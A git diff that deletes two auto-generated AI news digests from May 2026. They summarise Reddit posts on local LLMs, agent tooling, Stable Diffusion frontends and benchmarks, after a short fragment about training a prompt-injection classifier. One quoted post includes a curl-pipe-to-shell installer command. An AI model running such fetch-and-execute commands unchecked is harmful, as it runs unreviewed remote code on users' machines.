roughly how it went: `ml-intern` takes an HF token and supports OpenAI-compatible APIs, so I pointed it at OpenRouter (GPU-poor). The agent found existing datasets, [deepset/prompt-injections](https://huggingface.co/datasets/deepset/prompt-injections) and [Shomi28/prompt-injection-dataset](https://huggingface.co/datasets/Shomi28/prompt-injection-dataset), which simplified things since building the dataset is typically 95% of the work in tasks like this. For v1, I went with DistilBERT targeting CPU inference. After a few parameter sweeps, the agent launched a full run and landed at F1 95.87%. 
I also tried training an HRM-Text model, but the agent didn't figure it out and set up… - ---- - diff --git a/data/digest-2026-05-23.md b/data/digest-2026-05-23.md deleted file mode 100644 index 796d620..0000000 --- a/data/digest-2026-05-23.md +++ /dev/null @@ -1,121 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-23** | 15 stories | Auto-generated from 332 archived stories - ---- - -## [Open-source devtool for AI agent projects [P]](https://reddit.com/r/MachineLearning/comments/1tle50x/opensource_devtool_for_ai_agent_projects_p/) -*Reddit r/MachineLearning* | 23/05/2026 | Score: 1.00 -Tags: api_update, open_source, agent_tool - -> Hi everyone, We are building **AgentLantern**, an open-source devtool for AI agent projects. The idea is simple: as agent-based projects grow, it becomes harder to understand how agents, tasks, tools, and configuration files are connected. **AgentLantern** aims to make these projects easier to document, analyze, validate, and visualize. I started with CrewAI support, but the goal is to progressively extend **AgentLantern** to other agent frameworks. **AgentLantern** currently provides three main features: * **Lantern Docs**: generates browsable documentation from source code and configuration files, without LLM calls or API keys. * **Lantern Lint**: statically checks agent projects to detect design or configuration issues before runtime. * **Lantern Play**: runs the project and opens a pixel-art runtime viewer to observe agents working, delegating, calling tools, and producing outputs. The project is still early, and I’m mainly looking for feedback from people building with AI agents, multi-agent systems, or devtools. 
here is a demo video showing the execution of a multi-agent system: [3\_mins\_Video](https://www.youtube.com/watch?v=Rklr86AiKuk) Docs: [https://brellsanwouo.github.… - ---- - -## [Apex-Testing: real-world, real repos, agentic coding benchmark (Update)](https://reddit.com/r/LocalLLaMA/comments/1tlh4vq/apextesting_realworld_real_repos_agentic_coding/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> **BIG Apex-Testing update!** [https://www.apex-testing.org/](https://www.apex-testing.org/) **The Real-World Agentic Coding** benchmark has been (95%) updated with all recent models! This is based on 65-70 **actual private github repos** made especially to test proper agentic coding capabilities of models. **For those who don't know about the project and see it for the first time, here's the excerpt from the website:** "**What is APEX Testing?** Every week there's a new model that's "the best ever." Every provider promises 10x performance at a fraction of the cost. Benchmarks get cherry-picked, their demos get curated, influencers get paid and people keep falling for it. APEX exists because I got tired of the hype and the intentional benchmaxxing. Models get dropped into real codebases with real bugs and real feature requests, and they have to figure it out like a developer would. 70 tasks across 8 categories, all based on work you'd actually encounter on the job. You get to see what actually works and what's just marketing." **What's included currently in metrics:** \- Avg Cost \- Avg Time \- Scoring based off each category/difficulty \- ELO-based Leaderboard (see details on the… - ---- - -## [LLaMa.cpp basic question](https://reddit.com/r/LocalLLaMA/comments/1tlat5r/llamacpp_basic_question/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: developer_tool, cli_tool - -> I'm trying to install LLaMa with PI agent. 
I ran curl -fsSL https://pi.dev/install.sh | sh export PATH="/home/user/.local/share/pi-node/node-v22.22.3-linux-x64/bin:$PATH pi install npm:pi-llama.cpp ​ These commands installed pi, added them to path and then I lastly installed an extension that supposedly allows PI agent to connect to my llama models (was that safe or is there a safer way of doing it?). Lastly I ran `yay llama.cpp-vulkan` to install llama.cpp-vulkan.​ Unlike Ollama where I can just get models super easily I have no clue how to get them here. I googled it and asked ChatGPT but I still am so confused. Am I missing something? How do I do it? - ---- - -## [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://reddit.com/r/LocalLLaMA/comments/1tl4wpi/meituanlongcatlongcatvideoavatar15_hugging_face/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> # 🚀 Model Introduction We are excited to announce the release of LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. 
* 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactions and object handling. * 🌟 **Efficient 8-Step Inference**: Advanced DMD2-… - ---- - -## [IMG Dataset Refiner v4.3 Pro is here! 🚀 The ultimate dataset prep tool for LoRAs](https://reddit.com/r/StableDiffusion/comments/1tl36zc/img_dataset_refiner_v43_pro_is_here_the_ultimate/) -*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hey everyone! A while back I shared v3 of my dataset tool. It was a great visual manager and balancer, but as I said back then: it didn't have auto-captioning. Well, that has completely changed! Welcome to v4.3 Pro. The project has taken a massive leap forward and is now a complete, professional *Data Engineering* suite for your AI model training (Flux, SD3, SDXL, etc.). **What's new?** 🤖 **Full AI Integration:** Local AI (LM Studio/Ollama) & Cloud APIs (Claude, Gemini, OpenAI) to auto-caption, translate, and even hunt down visual hallucinations. 🪄 **Smart AI Recipe Generation:** It automatically analyzes your entire dataset and generates the perfect keyword "recipe" (pinning your Trigger Word to the top) for Civitai! 📚 **Mass Batch Editor:** Add, remove, or replace specific tags across a huge selection of images in a single click. 🧹 **Built-in Pre-processing:** Visual duplicate finder, Smart Face Cropping, and mass high-quality resizing. ⚡ **Lightning Fast UI:** Native drag-and-drop for Windows folders, side toggles for a bigger workspace, and real-time translation. It's still the "recipe book for your LoRAs", and it's still 100% Open-Source! 
I've even added 1-click Windo… - ---- - -## [got tired of claude code forgetting everything every session, built VIR for it](https://reddit.com/r/ClaudeAI/comments/1tlcai2/got_tired_of_claude_code_forgetting_everything/) -*Reddit r/ClaudeAI* | 23/05/2026 | Score: 0.86 -Tags: mcp, cli_tool - -> Every session i'm debugging something, figuring out a pattern, making some decision with claude that took us 30 minutes to think through. Then i close the terminal and it's just gone. Next day i'm asking the same questions about the same codebase. I was already tracking stuff manually. CLAUDE.md per project, lessons.md, handoff.md, tasks/ folders. But i'd only write down maybe 5% of what was actually useful. The real reasoning was always still buried in the transcripts. Looked in \~/.claude/projects one day. 226 jsonl files sitting there. Months of work, none of it being used. So i built vir. It reads your sessions in the background, classifies them (pattern / gotcha / decision / tool), distills the useful stuff into an obsidian vault. Then exposes the vault as an mcp server so claude can query it mid-session, basically giving claude code memory across sessions. You can also query it yourself if you're curious what's in there: \`\`\` vir query "what gotchas have i hit with auth" \`\`\` There's stuff in those transcripts you'll never reread manually. Vir surfaces it. Ran it on my own 226 sessions: 126 notes out, 0.91 avg confidence, across 8 projects. Local-first, runs on mac/linux… - ---- - -## [Four calls became one: letting the agent author tools mid-session](https://reddit.com/r/ClaudeAI/comments/1tl91km/four_calls_became_one_letting_the_agent_author/) -*Reddit r/ClaudeAI* | 23/05/2026 | Score: 0.70 -Tags: mcp, developer_tool - -> MCP in practice is a connector marketplace, not a runtime. You pick servers up front, the agent inherits a fixed catalog, and turn 1 looks the same as turn 200. The session conforms to the toolset. That ordering is backwards. 
Most non-trivial work surfaces a tool-shaped gap halfway through. The general catalog gets there in five calls. A bespoke wrapper gets there in one and survives into the next session. The question is whether the agent can close that gap without leaving the conversation. Yesterday I was chasing a flaky recipe. Four calls, every time: query traces, grep for the name, sort by timestamp, diff the two most recent failures. The agent noticed on the third repetition and wrote `findFlakyRecipeRuns(name)` into a watched plugin directory — a wrapper around the existing tools that returns the diff directly. Next turn, one call. By the end of the session there were four of these. I wouldn't have specified any of them in advance; all of them match the shape of the work. The literature calls this a self-modifying execution environment. It's been a footnote because five things have to be true together: 1. The agent writes a tool definition. 2. The runtime registers it witho… - ---- - -## [Jack Clark announces fictional story with optimistic outlook on humanity's future amid powerful AI systems for next Import AI newsletter — Issue publishes Tuesday; reply questions thematic shift.](https://www.digg.com/ai/esmbs3o1?rank=8) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [SemiAnalysis posted data from 174,264 agentic coding sessions showing 42% of runtime on CPU tasks versus 58% on GPU inference and highlighted cloud pricing mismatches with per-token monetization — Median per-turn time measured 5.13 seconds.](https://www.digg.com/ai/h7rp9igv?rank=6) -*Digg AI* | Score: 1.00 -Tags: agent_tool - ---- - -## [What features do you wish ComfyUI or A1111 had?](https://reddit.com/r/StableDiffusion/comments/1tllp2t/what_features_do_you_wish_comfyui_or_a1111_had/) -*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 -Tags: open_source - -> TL;DR: I’m building a local orchestration layer on top of ComfyUI, A1111, and Easy Diffusion that manages workflows, prompt generation, 
tagging, scoring, and generation history to figure out which models/LoRAs/settings actually produce the best results over time. What next features would you find useful? A little while ago I asked people what features they liked most in their local AI image/video UI setups. Since then I’ve kept building my own local orchestration app around ComfyUI, Easy Diffusion, and Automatic1111, and it has evolved into more of a full workflow layer than I originally planned. I’ll eventually open source it, so I’d love feedback from people who spend a lot of time with local generation tools. The idea is basically this: Instead of using one UI directly for everything, the app sits on top of multiple local backends and manages the overall generation workflow, history, orchestration, and review process. Right now it supports: * launching/stopping backends from inside the app * choosing which backend to use per run * queued multi-run jobs * image + video generation workflows * selecting saved ComfyUI workflows * centralized gallery/history across all runs * per-im… - ---- - -## [GitHub - ForgeFlash: A clean, minimal frontend for Stable Diffusion WebUI Forge — inspired by Fooocus's streamlined workflow but with direct access to the controls that actually matter.](https://reddit.com/r/StableDiffusion/comments/1tll04p/github_forgeflash_a_clean_minimal_frontend_for/) -*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 -Tags: api_update - -> Hi all. My workflow usually includes quick drafting with Fooocus and/or WebUI before committing to batch generation in ComfyUI, and while I enjoy the streamlined approach of Fooocus, the missing hi-res/upscale etc is a drag. And WebUI sometimes feels a bit too busy for when I just want to 'prompt and go'. So I created this very simple new UI which sits between the two philosophically. You need Forge running, but the UI itself is very streamlined HTML/JS/CSS file leveraging Forge in API mode. 
The Readme covers all the details and modifying the hard coded parts is quite simple. Just launch forge with API parameters and open the web page in your browser, it will point to [http://127.0.0.1:7860](http://127.0.0.1:7860) by default and get your installed checkpoints etc. PNG metadata stripping also included. Any comments and feedback welcome, as I do have some ideas for further development, but intend to keep it lightweight and easy to approach. - ---- - -## [Benchmarked Needle 26M vs Qwen3-0.6B on CPU function calling, 50 queries across 5 difficulty tiers. The 23x smaller model wins on accuracy and is 4.4x faster.](https://reddit.com/r/LocalLLaMA/comments/1tljs5o/benchmarked_needle_26m_vs_qwen306b_on_cpu/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: api_update - -> Ran a head-to-head on two open-weight models for tool-calling on a 4-core CPU, no GPU, no cherry-picking. Wanted to see if the small specialist (Needle, 26M, distilled from Gemini 3.1 for function calls) actually holds up against a small generalist (Qwen3-0.6B) that also does tools. Setup: 50 queries across 5 tiers (simple, paraphrased, implicit, ambiguous, edge cases including foreign language and a "don't call any tool" trap). 5 mock tools. Three metrics per run: parse\_success, tool\_match, args\_match. Same queries, same eval rubric, same hardware. Headline numbers: Needle (26M) Qwen3 (0.6B) tool_match overall 72.0% 56.0% parse_success 84.0% 54.0% args_match | match 97.2% 100.0% mean latency 10.9s 47.9s The interesting part is not the overall win, it's the failure shapes. They diverge completely: * **Needle** fails by picking the wrong tool. When it does pick a tool, args are right 97% of the time. Its sin is selection, mostly routing system commands to search\_web instead of run\_command. * **Qwen3** fails by not calling a tool at all. Every single one of its 22 misses is a parse failure where it answered in prose instead of emitting `<tool_call>` tags. 
When it does emi… - ---- - -## [GPT 5.5 "secret sauce" is just having the thinking be some stupid caveman mode?](https://reddit.com/r/LocalLLaMA/comments/1tljrtk/gpt_55_secret_sauce_is_just_having_the_thinking/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: open_source - -> I think I had GPT-5.5 leak its trace during a normal conversation, and it really reads like the caveman mode fad from a few months back. Maybe we can achieve better token efficiency by taking some high-quality thinking trace from an open model, "caveman-izing" it, and fine-tuning on it. Here is the full log of GPT-5.5 going insane: https://gist.github.com/aussetg/20747ae00df17992acb4ebdfcd8d8d88 EDIT: Ok people I got it the first time - ---- - -## [My experience using Claude code with Local Llm, and full guide on how to set it up](https://reddit.com/r/ClaudeAI/comments/1tlir65/my_experience_using_claude_code_with_local_llm/) -*Reddit r/ClaudeAI* | 23/05/2026 | Score: 1.00 -Tags: api_update - -> Wanted to share a workflow I tested on a real flight, in case anyone else is trying to set up offline Claude Code. The core idea: using ollama to pull the needed model of what you need, and then use it to run claude code The setup, in order: 1. Pull a model on home wifi the night before. \`ollama pull <model>\` — \~9 GB for a 14B, \~17 GB for a 26B. Don't try this at the gate. 2. In Claude Code, point at Ollama. The cleanest path I found is wrapping it in two aliases: alias claude-local='ollama launch claude --model gemma4:26b' alias claude-cloud='claude' 3. Verify on the ground with wifi physically off. If it works in airplane mode at home, it works at 10 km in the sky. Where I got it wrong: I prepped qwen2.5-coder:14b first because it's the model everyone recommends in local-LLM threads. On the flight, it choked on Claude Code's tool loop; one call took 25 seconds, another took 52. For a workflow that chains five or six tool calls per task, that's unusable. 
Switched mid-flight to gemma4:26b (which I'd pulled as a backup). Different category of model, RL-trained for tool use, not just code completion. The tool loop ran at a usable speed. The gap analysis I was running on a… - ---- - -## [Removing Vision from model](https://reddit.com/r/LocalLLaMA/comments/1tlhkts/removing_vision_from_model/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: agent_tool - -> I removed mmproj file from models to remove vision and save my vram. But just curious, is this really don't affect its text ability? I use Qwen 3.6 35b a3b by unsloth and mainly use for agentic coding - ---- - diff --git a/data/digest-2026-05-24.md b/data/digest-2026-05-24.md deleted file mode 100644 index 7c969dc..0000000 --- a/data/digest-2026-05-24.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-24** | 15 stories | Auto-generated from 365 archived stories - ---- - -## [I built a local GUI for the TradingAgents framework — works with Ollama](https://reddit.com/r/LocalLLaMA/comments/1tm2ct0/i_built_a_local_gui_for_the_tradingagents/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: open_source, developer_tool, cli_tool, tool_update - -> https://preview.redd.it/i90oxxk7n03h1.png?width=1898&format=png&auto=webp&s=7d219c804fda7dfe122b84fcdb6d0d6883818c68 A while back I came across [TradingAgents](https://github.com/TauricResearch/TradingAgents) — a really cool multi-agent LLM stock analysis framework where like a dozen "agents" (market analyst, news analyst, bull researcher, bear researcher, risk team, etc.) debate a stock and produce a final trade recommendation. The output is genuinely interesting to read. Problem: it ships as a CLI. You pick options in a terminal, watch logs scroll, then go hunt for markdown files on disk. The reports are good, the experience of getting to them isn't. So I forked it and bolted on a web GUI. 
Runs locally, talks to whatever LLM provider you have a key for (OpenAI, Anthropic, Google, OpenRouter, DeepSeek, Ollama, xAI, Qwen, GLM, MiniMax). All Apache 2.0. Some things I ended up adding because I wanted them: * Live pipeline visualization showing which agent is working * Reports tab with a 3-pane reader, table-of-contents, search * A "report length" knob (Concise / Standard / Comprehensive) — concise mode saves \~50% tokens * Multi-session chat where you can pin past report… - ---- - -## [VRAM Suite: early pre-alpha tool for VRAM diagnostics, bounded CUDA probing, and OOM risk estimation](https://reddit.com/r/StableDiffusion/comments/1tmixth/vram_suite_early_prealpha_tool_for_vram/) -*Reddit r/StableDiffusion* | 24/05/2026 | Score: 0.94 -Tags: api_update, developer_tool, cli_tool - -> # I started building VRAM Suite — a small framework for VRAM diagnostics in local AI workflows Hi. I wanted to share a small pre-alpha project I started building: \*\*VRAM Suite\*\*. The basic idea is simple: local AI workflows often fail with CUDA OOM only after everything has already started. I got tired of guessing how much VRAM is actually usable, so I started writing a small Python framework to inspect, record, and later predict VRAM behavior. It is still early, but the current version already has a working foundation. 
# What works now * CLI command: \`vramsuite doctor\` * Public Python API: \`import vramsuite\` * Structured doctor API: \`run\_doctor()\` * System/runtime fingerprinting * Optional PyTorch/CUDA detection * NVIDIA GPU memory reading through NVML using \`ctypes\` * Driver-level total/free/used VRAM without requiring PyTorch * \`.vramcard\` JSON profile format * Rich terminal report output * Optional bounded CUDA allocation probe through PyTorch * Basic OOM risk estimation using \`--estimate-mb\` # Example `uv run vramsuite doctor --probe --probe-max-mb 12288 --probe-step-mb 256 --probe-free-floor-mb 2048 --estimate-mb 8000` # Example output summary from my RTX 50… - ---- - -## [Claude working autonomously](https://reddit.com/r/ClaudeAI/comments/1tm9gm5/claude_working_autonomously/) -*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 -Tags: api_update, mcp, developer_tool - -> Goodmorning, Has anyone figure out how to configure Claude so that it runs autonomously, almost like Openclaw? I wanted to figure out if it could just autonomously respond to LinkedIn messages and reach out on my behalf? I know i can do this within cowork with mcp servers and tools but didn’t know if managed agents or the SDK would be my best option to try and create this full system - ---- - -## [Agent Zero CLI Update Signals Computer Use Polish For Agent Frameworks](https://x.com/alessandro_a0/status/2058278886572433812) -*Aligned News (Scoble)* | 24/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> A current post says A0 CLI v1.11 and Agent Zero v1.17 are live after a Computer Use announcement. - ---- - -## [Working on a cgo-free CUDA binding in Go for ML stuff Week 3 - open source [P]](https://reddit.com/r/MachineLearning/comments/1tmb4qw/working_on_a_cgofree_cuda_binding_in_go_for_ml/) -*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> At our work we use CUDA in Rust since the company switched to it recently. 
Rust has pretty good Driver API bindings but it made me wonder why the hell we cant have something decent in Go without cgo. I mostly build ML tools in the last month and Go is my main language for pretty much everything. Problem is most Go CUDA projects still need cgo and the full toolkit at build time. That breaks cross compilation and makes Docker images huge which sucks when working on machine learning projects. So last month I started messing around with a proof of concept that loads [libcuda.so](http://libcuda.so) at runtime using purego. No cgo at all. Biggest pain was thread affinity. CUDA keeps context per thread so goroutines switching around kept breaking things. I built a simple executor that locks an OS thread with runtime.LockOSThread and funnels all calls through a channel. Heres roughly what using it looks like right now: func run() error { cuda.Init() dev, _ := cuda.GetDevice(0) ctx, _ := dev.Primary() defer ctx.Close() a, _ := cuda.Alloc[float32](ctx, 1024) b, _ := cuda.Alloc[float32](ctx, 1024) c, _ := cuda.Alloc[float32](ctx, 1024) stream, _ := ctx.NewStream() start, _ := ctx.NewEvent()… - ---- - -## [PapersWithCode new features - week 1 [P]](https://reddit.com/r/MachineLearning/comments/1tmawv5/paperswithcode_new_features_week_1_p/) -*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hi, Niels here from the open-source team at Hugging Face. It's been one week since I [launched](https://www.reddit.com/r/MachineLearning/comments/1tgmwqr/reviving_paperswithcode_by_hugging_face_p/) [paperswithcode.co](http://paperswithcode.co), a revival of the website we all loved. It allows us to keep track of the state-of-the-art (SOTA) across various domains of AI, from agents to computer vision and time-series forecasting. The reception has been great, and I'm excited to extend this over the next few months. 
This week, I've added the following features: \- Support for multiple metrics for a given benchmark: leaderboards now support multiple metrics, see e.g., the [Open ASR Leaderboard](https://paperswithcode.co/benchmark/open-asr-leaderboard) for automatic speech recognition, which supports both Word Error Rate (WER) and the Inverse Real-Time Factor (RTFx) metrics, or the [Object Detection leaderboard](https://paperswithcode.co/benchmark/coco-val2017), which now also reports frames-per-second (FPS) besides mean average precision (mAP) on COCO. https://preview.redd.it/owlxn0b5u23h1.png?width=2878&format=png&auto=webp&s=1dff2f8feab4f160f77c97ceeb5d90e82382e63c \- Su… - ---- - -## [Qwen Plays ̶p̶̶o̶̶k̶̶e̶̶m̶̶o̶̶n̶ ? / QWEN PLAYS DCSS! - qwen3.6-35b-a3b@q4_k_xl plays open source roguelike adventure DCSS (and does a decent job)](https://reddit.com/r/LocalLLaMA/comments/1tm9nx3/qwen_plays_pokemon_qwen_plays_dcss_qwen3635ba3bq4/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Hi, (TLDR.): Qwen in its MTP version has tool call bugs and outputs everything into tool/thinking blocks - mangeling the output - canceling the +speed with repeated wrong tool calls! DCSS works well with non MTP qwen even on smaller qwants. im Testing the new MTP models and thought the Hermes plays pokemon skill would be fun to test - expecting codex doing a good job and Qwen at least being able to navigate etc - but after a little research it looks like all LLM (even the big ones) cant play pokemon without hickups - so i tried to find a game the LLM can play - to use it as benchmarks - all the numbers from the official benchmarks are a nice indicator but i wanted real tests - after tons of IMG research and push to telegram etc - palying games seemed the next step to test - Qwen can play DCSS in its qwen3.6-35b-a3b@q4\_k\_xl NON MTP VERSION pretty well! in a Terminal you can see/control if needed! 
- telegram text update + ascii/screenshots on milestones or errors \- MTP version produced mangeled tool calls! (240k context/8koutput token, 0,6 temp/20topK, 1Rep. penalty, 1.5 pres. penalty, 0.95 topP) LM studio on 5090 if anyone is interested in the skill / prompt i can upload it late… - ---- - -## [How I do use the recent llama.cpp native tools to do web rag a.k.a. web_fetch (or anything else for the matter) directly from inside the llama-server's webui](https://reddit.com/r/LocalLLaMA/comments/1tm93ng/how_i_do_use_the_recent_llamacpp_native_tools_to/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> As some other fellow lllmers I've discovered few days ago that the amazing llama.cpp project has just added native tools functionalities into the server. After having enabled the relative options into llama-server and played a bit with the most harmless of them all, get\_datetime, I've bit the bullet and cautiously enabled the big boss: exec\_shell\_command. Building upon my recent sandboxing efforts relative to pi coding agent, another fantastic tool, I implemented this workflow to more safely use it into linux by multi-sandboxing: step 0) enabled llama-server options for native tools step 1) install firejail system wide step 2) create a new linux user called vmagents (a.k.a. 
"virtual machine agent smith") to prevent escalation or messing up with my own user workspace home dir step 3) login into vmagents user and install smolmachines, an easy to use OCI virtual machine containers harness step 4) create a VM called minivm and start it to pull in a bare bones busybox commands based Alpine linux OCI image step 5) create the script minivm-exec (and make it executable) into vmagents exec dir to spinup the sandbox VM, exec a given command into it into further firejail sandbox, turn it… - ---- - -## [48 frontends for Comfy!](https://reddit.com/r/StableDiffusion/comments/1tm25k8/48_frontends_for_comfy/) -*Reddit r/StableDiffusion* | 24/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> This is an update of the list that I made 5 months ago. [4 months ago it was 26](https://www.reddit.com/r/StableDiffusion/comments/1qyrw4z/26_frontends_for_comfy/). Many of UIs were suggested by user iwr-redmond. Below is list with only names; links, descriptions are in the awesome list itself on github: [https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui](https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui) Category 1: Close integration, work with the same workflows 1. SwarmUI 2. Minimalistic Comfy Wrapper WebUI 3. Open Creative Studio for ComfyUI 4. ComfyUI Mobile Frontend 5. ComfyMobileUI 6. ComfyChair 7. ComfyScript 8. WorkflowUI 9. FlowScale AIOS 10. ComfyUI-Workflow-Studio 11. Promptus CosyUI Category 2: UI for workflows exported in API format 1. ViewComfy 2. ComfyUI Mini 3. Generative AI for Krita (Krita AI diffusion) 4. Intel AI Playground 5. Comfy App (ComfyUIMobileApp) 6. ComfyUI Workflow Hub 7. Mycraft 8. ComfyUI WebUI Generator 9. Nexa - Your On-the-Go ComfyUI Companion 10. CivitDeck 11. ComfyUI Skills for OpenClaw 12. ComfyUI\_bsk\_UI 13. OutSweeper 14. 
Orange Category 3: Use Comfy UI as runner server (worklows made by developers) 1.… - ---- - -## [🚀 Skills for small businesses, officially released by Anthropic](https://reddit.com/r/ClaudeAI/comments/1tm94ai/skills_for_small_businesses_officially_released/) -*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 -Tags: developer_tool, agent_tool - -> Anthropic’s 31 small-business skills reportedly hit around 382,000 downloads on day one. And now someone has mapped the whole thing into a setup workflow that can apparently be deployed in \~10 minutes. This is actually a pretty interesting shift. Small businesses used to stitch together automations manually across: Zapier Notion CRM tools email workflows internal docs custom scripts Now AI companies are starting to package the whole thing into reusable skill packs: 🧠 workflow 📚 memory ⚙️ behavior 🔗 connectors 🤖 orchestration 📋 operating rules Basically: business operations as AI-readable skill files. The best part? You don’t necessarily need Claude to use them. At the core, these are still .md skill files describing workflows for AI agents. So even if you’re using Codex, Cursor, Gemini, or another coding agent, you can still study the structure, adapt the workflows, and plug the ideas into your own agent setup. This feels like the beginning of a new category: “AI business operating templates.” GitHub: https://github.com/anthropics/knowledge-work-plugins - ---- - -## [Claude code - Cultivate your context window to get the max out of your tokens](https://reddit.com/r/ClaudeAI/comments/1tm594m/claude_code_cultivate_your_context_window_to_get/) -*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 -Tags: api_update, mcp - -> Many times during the start of the session or when you have cleared or compacted the session, claude tends to read the entire codebase resulting in context window bloating. 
if your repo is large and/or if you are working with multiple repos it means your context window will have a lot of stuff which are not really relevant for the feature work that you are doing rn. Instead of claude having to read the entire codebase you have a map of your repos at different granularity and guide claude using [claude.md](http://claude.md) file to read the map. this helps claude get the context better without the context window bloating. if you are working on typescript/javascript based repos you can check what i built here in this repo: [https://github.com/justinjamesmathew/tokenmax-mcp](https://github.com/justinjamesmathew/tokenmax-mcp) the idea is to have three tiers of structural context loaded at three different times. The Registry is a small directory of every repo that is registered, with a short paragraph for each covering what it does, what stack it uses, where it lives, and when it was last indexed. It loads automatically into every Claude Code session via \~/.claude/[CLAUDE.md](http://c… - ---- - -## [LongCat-Video-Avatar 1.5 Release](https://reddit.com/r/StableDiffusion/comments/1tm5oxh/longcatvideoavatar_15_release/) -*Reddit r/StableDiffusion* | 24/05/2026 | Score: 0.78 -Tags: open_source, developer_tool - -> HuggingFace Link: [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5) LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. 
# [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactio… - ---- - -## [Claude records demo videos for me now](https://reddit.com/r/ClaudeAI/comments/1tmkee4/claude_records_demo_videos_for_me_now/) -*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.62 -Tags: open_source, tool_update - -> I hate recording demo videos, so I made an open source skill for it: [https://github.com/MobAI-App/desktop-recorder-skill](https://github.com/MobAI-App/desktop-recorder-skill) Now I can give Claude a prompt like: Record a short demo of this app flow And it handles the annoying parts for me: preparing the app state, clicking through the flow, recording, adding cursor/click effects and captions, then exporting the video. So instead of spending time setting everything up and recording the same demo manually, I can let Claude do it while I work on something else. It also has Remotion integration, so Claude can generate more polished and editable videos from the recording, not just raw screen captures. The video attached to this post is the result of the skill itself. 
Also working on the same idea for mobile apps: [https://github.com/MobAI-App/mobile-recorder-skill](https://github.com/MobAI-App/mobile-recorder-skill) - ---- - -## [hipEngine: Fast Native Qwen 3.6 Inference for RDNA3 (Strix Halo, 7900 XTX)](https://reddit.com/r/LocalLLaMA/comments/1tmq4s6/hipengine_fast_native_qwen_36_inference_for_rdna3/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: open_source - -> A few weeks ago, after finishing [FastDMS](https://www.reddit.com/r/LocalLLaMA/comments/1t3vlrx/fastdms_64x_kvcache_compression_running_faster/), I started toying around writing some RDNA3 kernels again to see how fast I could get Qwen 3.6 MoE running. It turned out well enough, so over the past couple weeks, I turned those experiments into [hipEngine](https://github.com/shisa-ai/hipEngine), a new open source (AGPLv3) ROCm-native local LLM inference engine. It's Python based, but with no heavy PyTorch dependency. All the hot-path is HIP/C++, making liberal use of AMD native libs like hipBLASLt, hipGraph, AOTriton, etc. 
